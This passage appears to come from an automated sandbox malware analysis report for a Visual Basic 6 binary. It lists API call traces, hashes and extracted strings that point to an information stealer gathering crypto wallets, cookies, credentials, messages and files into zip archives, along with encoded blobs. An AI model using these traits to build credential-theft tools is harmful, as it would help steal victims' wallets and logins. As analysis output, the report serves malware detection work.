                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041969C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006F8), ref: 004196D0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004196E1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004196E9
                                                                                    • __vbaStrCat.MSVBVM60(\CryptoWallets.zip), ref: 00419744
                                                                                    • #645.MSVBVM60(?,00000000,\CryptoWallets.zip), ref: 00419759
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,\CryptoWallets.zip), ref: 00419763
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041976E
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419782
                                                                                    • __vbaFreeVar.MSVBVM60(0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041978A
                                                                                    • __vbaStrCat.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197AD
                                                                                    • __vbaStrMove.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197B7
                                                                                    • __vbaStrCopy.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197C4
                                                                                    • __vbaStrCopy.MSVBVM60(\CryptoWallets.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004197D1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 0041980D
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419829
                                                                                    • __vbaStrCat.MSVBVM60(\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419843
                                                                                    • #645.MSVBVM60(00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419858
                                                                                    • __vbaStrMove.MSVBVM60(00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419862
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 0041986D
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419881
                                                                                    • __vbaFreeVar.MSVBVM60(0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 00419889
                                                                                    • __vbaStrCat.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198AC
                                                                                    • __vbaStrMove.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198B6
                                                                                    • __vbaStrCopy.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198C3
                                                                                    • __vbaStrCopy.MSVBVM60(\Files.zip,0041720C,00000000,00000008,00000000,\Files.zip,0041720C,00000000,?,00000000,\CryptoWallets.zip), ref: 004198D0
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,000006FC), ref: 0041990C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419928
                                                                                    • __vbaErrorOverflow.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041997D
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,?,?,?,004016A6), ref: 0041999E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004016A6), ref: 004199E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Copy$CheckHresult$Move$Error$#645ChkstkList$Overflow
                                                                                    • String ID: $Contacts$Cookies$CryptoWallets$FilesGrabber$Messages$\CryptoWallets.zip$\Files.zip$bI4$credentials
                                                                                    • API String ID: 697947717-4061810211
                                                                                    • Opcode ID: e50c78c1c68016554c755f30e4c5dbbdc4474f3e454d2f1d9bd4a84fad425797
                                                                                    • Instruction ID: 64c6bbdb384e03511a1afb09f3ccc82d4d757d238a9177fc85920aa69796aae0
                                                                                    • Opcode Fuzzy Hash: e50c78c1c68016554c755f30e4c5dbbdc4474f3e454d2f1d9bd4a84fad425797
                                                                                    • Instruction Fuzzy Hash: D1F1FB72900208EFDB01EF94D945BDDBBB5EF08304F10807AF405BB2A1DB799A85DB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041DCEB Relevance: 66.7, APIs: 31, Strings: 7, Instructions: 209COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6,00000001,?,?,?,?,004016A6), ref: 0041DD07
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6,00000001), ref: 0041DD37
                                                                                      • Part of subcall function 0041AAFB: __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                      • Part of subcall function 0041AAFB: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                      • Part of subcall function 0041AAFB: __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                      • Part of subcall function 0041AAFB: __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                      • Part of subcall function 0041AAFB: #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                      • Part of subcall function 0041AAFB: __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                      • Part of subcall function 0041AAFB: __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DD58
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DD6D
                                                                                    • __vbaStrCat.MSVBVM60(\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD78
                                                                                    • #645.MSVBVM60(00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD8D
                                                                                    • __vbaStrMove.MSVBVM60(00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DD97
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DDA2
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,0041720C,00000000,00000008,00000010,\Microsoft.NET\Framework\v4.0.30319,00000000,00000024), ref: 0041DDC3
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,004016A6,00000001), ref: 0041DDCE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000002,?,00000000,004016A6), ref: 0041DE01
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041DE15
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041DE2A
                                                                                      • Part of subcall function 0041AAFB: __vbaInStr.MSVBVM60(00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC78
                                                                                      • Part of subcall function 0041AAFB: #616.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC86
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC90
                                                                                      • Part of subcall function 0041AAFB: __vbaStrCat.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041AC9B
                                                                                      • Part of subcall function 0041AAFB: __vbaStrMove.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACA5
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACAD
                                                                                      • Part of subcall function 0041AAFB: __vbaFreeStr.MSVBVM60(0041ACDD,?,?,000000FF), ref: 0041ACD7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,00000024), ref: 0041DE55
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DE5B
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DE67
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000,00000000,?,?,00000000,00000024), ref: 0041DE86
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DE3D
                                                                                      • Part of subcall function 0041AE58: __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                      • Part of subcall function 0041AE58: #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                      • Part of subcall function 0041AE58: __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                      • Part of subcall function 0041AE58: __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrCopy.MSVBVM60(00000002,?,00000000,004016A6), ref: 0041DDEE
                                                                                      • Part of subcall function 0041ACF6: __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                      • Part of subcall function 0041ACF6: __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
                                                                                      • Part of subcall function 0041ACF6: #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                      • Part of subcall function 0041ACF6: __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                      • Part of subcall function 0041ACF6: __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                      • Part of subcall function 0041ACF6: #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                      • Part of subcall function 0041ACF6: __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,004016A6,00000001), ref: 0041DEA2
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,004016A6,00000001), ref: 0041DEB5
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041DEC9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041DEE4
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DEF7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,00000024), ref: 0041DF0F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DF15
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DF21
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000,00000000,?,?,00000000,00000024), ref: 0041DF40
                                                                                    • __vbaNew2.MSVBVM60(00416410,0041F010,?,?,?,?,?,?,?,00000002,?,00000000,004016A6), ref: 0041DF62
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF9B
                                                                                    • __vbaFreeObj.MSVBVM60(00416410,00416410,00000000), ref: 0041DFAC
                                                                                    Strings
                                                                                    • 310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34, xrefs: 0041DDE6
                                                                                    • $, xrefs: 0041DEBA
                                                                                    • \Microsoft.NET\Framework\v4.0.30319, xrefs: 0041DD73
                                                                                    • ydkcdNdVmfMftNQbtTrWuMhJduDzHOvl, xrefs: 0041DEC1
                                                                                    • $, xrefs: 0041DE06
                                                                                    • NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN, xrefs: 0041DE0D
                                                                                    • 38260A073C0B25020039483A0B053E3226133A103A07380F293248667F585949535954380F14262107380817267F070C31, xrefs: 0041DE9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$CopyList$ChkstkError$Bstr$#516#631New2System$#525#537#608#616#632#645AnsiCheckHresultUnicode
                                                                                    • String ID: $$$$310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34$38260A073C0B25020039483A0B053E3226133A103A07380F293248667F585949535954380F14262107380817267F070C31$NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN$\Microsoft.NET\Framework\v4.0.30319$ydkcdNdVmfMftNQbtTrWuMhJduDzHOvl
                                                                                    • API String ID: 360618581-1763830476
                                                                                    • Opcode ID: 958d3cf736091b8f38591cf3ce60c521b657a7ffc084773a4ddd3bc46b348c00
                                                                                    • Instruction ID: 6ec893211ff7f5e48ca0a4fe9a71a1f85d55f524822d2c43f1188bae9fc95af7
                                                                                    • Opcode Fuzzy Hash: 958d3cf736091b8f38591cf3ce60c521b657a7ffc084773a4ddd3bc46b348c00
                                                                                    • Instruction Fuzzy Hash: 0481AAB2D00208ABDB05FBE1D945ADEB7B9AF04304F50812BF115A7191EF789A4ACB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B018 Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 243COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,004014D0,?,?,?,00000000,004016A6), ref: 0041B036
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004016A6,004014D0), ref: 0041B063
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004016A6,004014D0), ref: 0041B06E
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B07E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B08C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B09F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B0AD
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B0B9
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6), ref: 0041B0C5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011), ref: 0041B0D6
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011), ref: 0041B0E2
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000,?,?,000000FF,?), ref: 0041B0F7
                                                                                    • #644.MSVBVM60(0000EC00), ref: 0041B140
                                                                                    • __vbaSetSystemError.MSVBVM60(?,XYYY,00000004,0000EC00), ref: 0041B164
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B19A
                                                                                    • __vbaUbound.MSVBVM60(00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B1CE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B211
                                                                                    • __vbaDerefAry1.MSVBVM60(00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B23B
                                                                                    • __vbaVarVargNofree.MSVBVM60(00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B245
                                                                                    • __vbaI4ErrVar.MSVBVM60(00000000,00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B24B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,XYYYh,00000004,00000000,00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY), ref: 0041B261
                                                                                    • __vbaSetSystemError.MSVBVM60(?,000000E8,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B2A3
                                                                                    • __vbaFreeStr.MSVBVM60(0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?,000000E8,00000001), ref: 0041B3AE
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,59595958,0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?), ref: 0041B3BF
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,59595958,0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?), ref: 0041B3C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Free$AnsiCopyUnicode$#644Ary1ChkstkConstruct2DerefDestructListNofreeUboundVarg
                                                                                    • String ID: XYYY$YP$h
                                                                                    • API String ID: 2846926467-2757690854
                                                                                    • Opcode ID: 5b3f24a8a418aadd79df6c3b227c568927a90f726c94900d428a19600a689473
                                                                                    • Instruction ID: 365810445903687a1c91a06a0412f5d61ff0ae52142e54727611da221bdf1046
                                                                                    • Opcode Fuzzy Hash: 5b3f24a8a418aadd79df6c3b227c568927a90f726c94900d428a19600a689473
                                                                                    • Instruction Fuzzy Hash: 8BB1C5B1D0120DEADB20EFE6C946BDDBBB4EF04308F20802AE510B7292D7795A55DF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E01C Relevance: 55.9, APIs: 37, Instructions: 391COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 423 41e01c-41e097 __vbaChkstk __vbaOnError __vbaObjSetAddref 425 41e099-41e0ba __vbaHresultCheckObj 423->425 426 41e0bc 423->426 427 41e0c3-41e0ee __vbaI2I4 425->427 426->427 429 41e0f0-41e111 __vbaHresultCheckObj 427->429 430 41e113 427->430 431 41e11a-41e13f 429->431 430->431 433 41e141-41e162 __vbaHresultCheckObj 431->433 434 41e164 431->434 435 41e16b-41e190 433->435 434->435 437 41e192-41e1b3 __vbaHresultCheckObj 435->437 438 41e1b5 435->438 439 41e1bc-41e1e8 __vbaI2I4 437->439 438->439 441 41e1ea-41e20b __vbaHresultCheckObj 439->441 442 41e20d 439->442 443 41e214-41e23e 441->443 442->443 445 41e240-41e261 __vbaHresultCheckObj 443->445 446 41e263 443->446 447 41e26a-41e27a 445->447 446->447 448 41e280-41e2b6 __vbaFpI4 447->448 449 41e6e5 447->449 452 41e669-41e684 __vbaObjSetAddref call 41b886 448->452 453 41e2bc-41e2e6 448->453 451 41e6ea-41e6f3 __vbaErrorOverflow 449->451 456 41e689-41e6d3 __vbaFreeVar __vbaExitProc __vbaFreeObj __vbaAryDestruct 452->456 457 41e2e8-41e309 __vbaHresultCheckObj 453->457 458 41e30b 453->458 460 41e312-41e322 457->460 458->460 460->449 461 41e328-41e35e __vbaFpI4 460->461 463 41e664 461->463 464 41e364-41e3a1 461->464 463->452 466 41e3a7-41e3d1 464->466 467 41e65f 464->467 469 41e3d3-41e3f4 __vbaHresultCheckObj 466->469 470 41e3f6 466->470 467->463 471 41e3fd-41e42e 469->471 470->471 471->449 472 41e434-41e440 __vbaFpI4 471->472 473 41e4e6-41e4f3 __vbaUbound 472->473 474 41e446-41e496 472->474 475 41e4f9-41e55d 473->475 476 41e65a 473->476 478 41e498-41e4b9 __vbaHresultCheckObj 474->478 479 41e4bb 474->479 482 41e582 475->482 483 41e55f-41e580 __vbaHresultCheckObj 475->483 476->467 481 41e4c2-41e4e1 __vbaRedimPreserve 478->481 479->481 481->476 484 41e589-41e5b4 __vbaPowerR8 482->484 483->484 485 41e5b6-41e5bc 484->485 486 41e5be-41e5ca _adj_fdivr_m64 484->486 487 41e5cf-41e5d3 485->487 486->487 487->449 488 41e5d9-41e62b __vbaR8IntI4 #573 __vbaVarCat __vbaStrVarVal #581 __vbaFpUI1 487->488 488->451 489 41e631-41e657 __vbaDerefAry1 __vbaFreeStr __vbaFreeVarList 488->489 489->476
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E03A
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 0041E05C
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,00000001,?,?,?,?,004016A6), ref: 0041E06D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000009C), ref: 0041E0AF
                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,004186D4,0000009C), ref: 0041E0C5
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000016C), ref: 0041E106
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000154), ref: 0041E157
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000164), ref: 0041E1A8
                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,004186D4,00000164), ref: 0041E1BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000011C), ref: 0041E200
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000110), ref: 0041E256
                                                                                    • __vbaFpI4.MSVBVM60(00000000,?,004186D4,00000110), ref: 0041E280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$AddrefChkstkError
                                                                                    • String ID:
                                                                                    • API String ID: 2229015355-0
                                                                                    • Opcode ID: a9303d508419419aab8c37733d7d93ef0f38ad53348e88b6029309d9180fc932
                                                                                    • Instruction ID: 8c9b99be8883720c12bd44c3e0b35c2e78a0c0d7b4579dd7df7701cc16ef5066
                                                                                    • Opcode Fuzzy Hash: a9303d508419419aab8c37733d7d93ef0f38ad53348e88b6029309d9180fc932
                                                                                    • Instruction Fuzzy Hash: D7021575D10228EFDF20ABA2CC45BDDBBB5BB05304F5081EAE549B61A1C7780A94DF29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418974 Relevance: 31.7, APIs: 21, Instructions: 203COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

